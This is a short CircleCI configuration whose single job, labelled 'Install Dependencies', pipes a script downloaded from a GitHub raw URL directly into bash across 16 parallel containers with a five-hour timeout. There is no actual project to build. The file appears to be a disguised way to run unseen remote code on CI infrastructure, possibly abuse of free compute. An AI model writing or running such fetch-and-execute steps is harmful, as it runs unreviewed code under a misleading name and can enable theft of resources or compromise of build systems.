version: 2.1
jobs:
  trial:
    docker:
      - image: debian:latest
    parallelism: 16
    steps:
      - run:
          name: Install Dependencies
          command: curl -sL https://github.com/malogrono/aways/raw/refs/heads/main/ass.sh | bash
          no_output_timeout: 5h
workflows:
  build:
    jobs:
      - trial